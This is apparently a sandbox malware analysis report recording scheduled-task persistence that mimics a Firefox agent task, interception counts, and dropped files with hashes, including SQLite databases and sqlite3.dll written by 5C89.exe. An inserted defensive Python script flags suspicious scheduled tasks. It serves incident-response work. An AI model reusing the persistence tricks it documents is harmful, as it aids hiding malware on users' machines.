                                                                                  Warnings:
                                                                                  Show All
                                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                  • TCP Packets have been reduced to 100
                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 20.189.173.22, 40.91.112.76, 20.54.110.249, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179
                                                                                  • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                  Simulations

                                                                                  Behavior and APIs

Time | Type | Description
09:24:58 | Task Scheduler | Run new task: Firefox Default Browser Agent 5309D4B020312F94 path: C:\Users\user\AppData\Roaming\rifsswe
09:25:10 | API Interceptor | 1x Sleep call for process: DB31.exe modified
09:25:22 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
09:25:22 | API Interceptor | 8x Sleep call for process: svchost.exe modified
09:25:58 | API Interceptor | 6x Sleep call for process: 5C89.exe modified
09:25:58 | API Interceptor | 550x Sleep call for process: mjlooy.exe modified
09:25:59 | Task Scheduler | Run new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
09:26:19 | API Interceptor | 12x Sleep call for process: F65C.exe modified
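The two Task Scheduler rows above are the persistence a responder should hunt for on other hosts: one task borrows the name of Firefox's genuine "Firefox Default Browser Agent <hash>" task but points at an extensionless file in AppData\Roaming, the other runs mjlooy.exe from AppData\Local\Temp. The Python below is an added example, not part of the Joe Sandbox report: it triages the verbose CSV that `schtasks /query /fo CSV /v` prints, flagging tasks whose action lives in a user-writable directory, has no file extension, or reuses a vendor task name without pointing into the vendor's install directory. The CSV is constructed (only a subset of schtasks' columns is kept; the two task/path pairs come from the report, the benign rows are made up), and SAMPLE_ENV stands in for the host's environment so the example runs offline.

```python
"""Triage Windows scheduled tasks for user-writable action paths and name mimicry."""
import csv
import io
import re
from typing import Dict, List

# Constructed sample: a subset of the columns 'schtasks /query /fo CSV /v' emits.
# Rows 2 and 3 reproduce the tasks the sandbox report recorded; rows 1 and 4 are
# made-up benign entries (a built-in task and a real Firefox agent task) for contrast.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"DESKTOP-1","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -k -g -$","SYSTEM","Weekly"
"DESKTOP-1","\Firefox Default Browser Agent 5309D4B020312F94","C:\Users\user\AppData\Roaming\rifsswe","user","Daily"
"DESKTOP-1","\mjlooy.exe","C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe","user","One Time Only"
"DESKTOP-1","\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB","C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task ""308046B0AF4A39CB""","user","Daily"
'''

# Constructed environment map (schtasks prints %windir%-style references unexpanded).
SAMPLE_ENV = {"windir": r"C:\Windows", "systemroot": r"C:\Windows",
              "programfiles": r"C:\Program Files"}

TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
# Legitimate task names that malware borrows, mapped to the directory the real binary lives in.
MIMICRY = {"firefox default browser agent": "\\mozilla firefox\\"}
_EXT = r"\.(?:exe|com|scr|dll|bat|cmd|ps1|vbs|js)"


def expand_env(path: str, env: Dict[str, str]) -> str:
    """Expand %VAR% references case-insensitively; unknown variables are left as-is."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), path)


def executable_from_action(action: str) -> str:
    """Pull the program out of a 'Task To Run' value, dropping its arguments.

    Handles quoted paths, unquoted paths containing spaces (schtasks prints the
    Firefox agent that way), and extensionless targets such as the one in the report.
    """
    action = action.strip()
    if action.startswith('"'):
        end = action.find('"', 1)
        return action[1:end] if end > 0 else action[1:]
    m = re.match(rf"^(.*?{_EXT})(?:\s|$)", action, re.IGNORECASE)
    if m:
        return m.group(1)
    return action if " " not in action else action.split()[0]


def normalize(path: str, env: Dict[str, str]) -> str:
    return expand_env(path, env).replace("/", "\\").lower()


def assess_task(name: str, action: str, env: Dict[str, str]) -> List[str]:
    """Return the reasons a task looks suspicious; an empty list means nothing stood out."""
    exe = normalize(executable_from_action(action), env)
    reasons: List[str] = []
    if any(marker in exe for marker in USER_WRITABLE):
        reasons.append("action runs from a user-writable directory")
    elif not exe.startswith(TRUSTED_ROOTS):
        reasons.append("action runs from outside Windows/Program Files")
    if "." not in exe.rsplit("\\", 1)[-1]:
        reasons.append("action has no file extension")
    leaf = name.rsplit("\\", 1)[-1].lower()
    for prefix, expected_dir in MIMICRY.items():
        if leaf.startswith(prefix) and expected_dir not in exe:
            reasons.append(f"name mimics '{prefix}' but binary is not under '{expected_dir}'")
    return reasons


def triage(csv_text: str, env: Dict[str, str]) -> List[dict]:
    """Return only the suspicious tasks from verbose schtasks CSV output."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = assess_task(row["TaskName"], row["Task To Run"], env)
        if reasons:
            findings.append({"task": row["TaskName"], "user": row["Run As User"],
                             "action": row["Task To Run"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_SCHTASKS_CSV, SAMPLE_ENV):
        print(f"{finding['task']}  ({finding['user']})  ->  {finding['action']}")
        for reason in finding["reasons"]:
            print("    -", reason)
```

On a live host, feed `triage()` the output of `schtasks /query /fo CSV /v` (and a map built from `os.environ`) instead of the sample; the allowlist of trusted roots is deliberately short so that anything unusual surfaces for a human to look at rather than being silently accepted.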

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  No context

                                                                                  Domains

                                                                                  No context

                                                                                  ASN

                                                                                  No context

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9334.exe_a5565ef87128e315374a33b3a55a1296f2841c6_94cfe485_18fbbefb\Report.wer
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):65536
                                                                                  Entropy (8bit):0.8127421426857177
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:wy4PvFoo+L8QJYOQoJ7R3V6tpXIQcQec6tycEfcw32+HbHg/8BRTf3o8Fa9iVfOn:9gvyV8Qh8HQ0lLjIq/u7snS274Itr
                                                                                  MD5:6F6811213DC38FF2AFDB04F3CD55FF1A
                                                                                  SHA1:64F43638AEC6C761650F890FF2CD403FA3D6DAC5
                                                                                  SHA-256:E4404798C093AFDD465AADFACD5D3127BEE372A8939F9C3BFBF3202692A5A8FD
                                                                                  SHA-512:5E8A8ECFC05DC3A0116077417A3BE790C38939CD383C817AE5FDD349BA2406CBFCD272BFB753205D84F25BDF689F72BB74FF013561A43C4DA18372E923DD1181
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.2.2.3.0.9.4.4.9.0.0.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.2.2.3.2.0.0.4.2.7.2.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.d.d.1.c.7.e.-.4.7.e.3.-.4.3.b.a.-.8.5.f.1.-.a.a.c.4.e.4.5.7.7.1.f.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.5.b.3.d.3.3.-.c.7.8.2.-.4.4.f.f.-.9.6.5.e.-.f.5.8.7.d.e.3.5.d.8.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.3.3.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.c.-.0.0.0.1.-.0.0.1.b.-.e.0.a.e.-.a.a.3.9.2.0.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.a.c.c.6.9.e.a.a.d.b.5.b.5.c.c.2.7.e.9.2.7.f.3.0.a.c.e.0.5.4.e.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.9.3.3.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER180D.tmp.dmp
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Mini DuMP crash report, 14 streams, Fri Jan 14 08:25:13 2022, 0x1205a4 type
                                                                                  Category:dropped
                                                                                  Size (bytes):36668
                                                                                  Entropy (8bit):2.119769547883536
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:/75VjONBOeh0kcSLWgKjM2Er8TDjRfvNeUkkt:TeK3lnt
                                                                                  MD5:2C6138896A76E4B6272E90D3BDA15F56
                                                                                  SHA1:D5DB3E974F8D4C01F98D71342BDB70004D9757DC
                                                                                  SHA-256:0C14C62E9BD24CABEAC04A5C10614CCE9E66E3CDC8040F2C60A465CE5311FBEE
                                                                                  SHA-512:9FA50441E67EC793DD839C1A474B427E372633817234BB645F04A41B0F43549057D4FAA0711C215081DC5FE4CDA00BE83CAF0DEBCF305D4126B420D6C75A3102
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MDMP....... .......i3.a........................................z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T...........]3.a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER27DD.tmp.WERInternalMetadata.xml
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):8392
                                                                                  Entropy (8bit):3.7000265245349317
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Rrl7r3GLNiaZ6h6YrQSU6I6gmfSRSy/+pDp89bxvIcsfMbm:RrlsNiM6h6Y8SUQgmfSRSQxvIvft
                                                                                  MD5:9728EFE3FCD1F2EDF2455C6C24A0E3A8
                                                                                  SHA1:20CC9CA877B4F4FBE84ADFCF86985336F211DA16
                                                                                  SHA-256:34E3320BCDFE5FC9DA5D259788C15BBC12D7A9EA8CF3EC9ED851E51C27C9DF31
                                                                                  SHA-512:7FA47509ECF9AF82644E844110B79883B40CDAC1A881A778500D8A6A299176BC2D76FCE9DAD29BF898C4991A05A527F4912AE4874FC23CBA83CC53310BF268C2
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.0.<./.P.i.d.>.......
                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B39.tmp.xml
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):4685
                                                                                  Entropy (8bit):4.47401591312699
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cvIwSD8zsvJgtWI9YGWSC8B+b8fm8M4JUq8qF+LmHV+q8voq8XDt3efd:uITfRLHSNLJUrAVKoDDt3efd
                                                                                  MD5:500A558B8AF1D586EF5471DEB82D8602
                                                                                  SHA1:DF7939F10AAB10431EEC217AF7C43EB68C4AD4DD
                                                                                  SHA-256:75C4307E165914D4F166FD85510231B7E5B0AA71E462E664DF1D9021D0508540
                                                                                  SHA-512:0332FE01BE4694D34FFC2259FB9E4CC46352B9FA2983C26198776F498B174E10C0F26CA5E2AFD44443607C8A50C5C114CDFD5502580FC6C1BFD6D855D187BD23
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1341695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB48.tmp.csv
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):52752
                                                                                  Entropy (8bit):3.033752492589164
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:Z8Hq4E/6LytGTdG/xEaa6QZ7uw7qO2Ivta3ou1kfEvdO25:Z8Hqb6LvTdG/xyZ7urBzou1kfEvdp5
                                                                                  MD5:41B4C10832B6C2E2EDBC4603B5751BCC
                                                                                  SHA1:CE1FC1463DDFF7A19F40D09C25839C3A1424A0AA
                                                                                  SHA-256:9E6AD05DA0DA5BCA00A6EE12209009741A352DAA4E78007CFB0AA97CC6A81A03
                                                                                  SHA-512:88A36BE9A669C3D3CDF6212651DE769AF93921EABE0F46D11B9F29A46770B1C4D33595D14931D6FAE3D52D3B7B447F34AEABFB80249ECBB76669C997854843B7
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF8F.tmp.txt
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):13340
                                                                                  Entropy (8bit):2.6951624028803427
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:9GiZYWUw0pVsYsaYtWjhJpyHQUYEZfRtriojXtt7wOxn07bja/8y/EcxINT3:9jZD32nh4dx6bja/8y/VuNT3
                                                                                  MD5:32C5799696111CD15DF44F24AC2EEF77
                                                                                  SHA1:4FD6DB5108A818C1DC4FD6EED09C6CF85FD8401E
                                                                                  SHA-256:64AB345C0B68D01374BB3231B456712BDD34BAEE43B23B78A6962F9C5B1AA7DD
                                                                                  SHA-512:AA873092EB6545AA15C123617C353509E2C4E40AC93AF706C39BA91587CBA79F6F42F7EA8AE8491950B4121A22CEF0F22F64D11853A40CF5E4C4E5C4A972E332
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                  C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\LocalLow\RYwTiizs2t
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\LocalLow\rQF69AzBla
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                  MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                  SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                  SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                  SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\LocalLow\sG8rM8v\dI3hX2r.zip
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:Zip archive data, at least v2.0 to extract
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
                                                                                  MD5:1117CD347D09C43C1F2079439056ADA3
                                                                                  SHA1:93C2CE5FC4924314318554E131CFBCD119F01AB6
                                                                                  SHA-256:4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
                                                                                  SHA-512:FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                                                  MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                                                  SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                                                  SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                                                  SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\F65C.exe.log
                                                                                  Process:C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):700
                                                                                  Entropy (8bit):5.346524082657112
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                  MD5:65CF801545098D915A06D8318D296A01
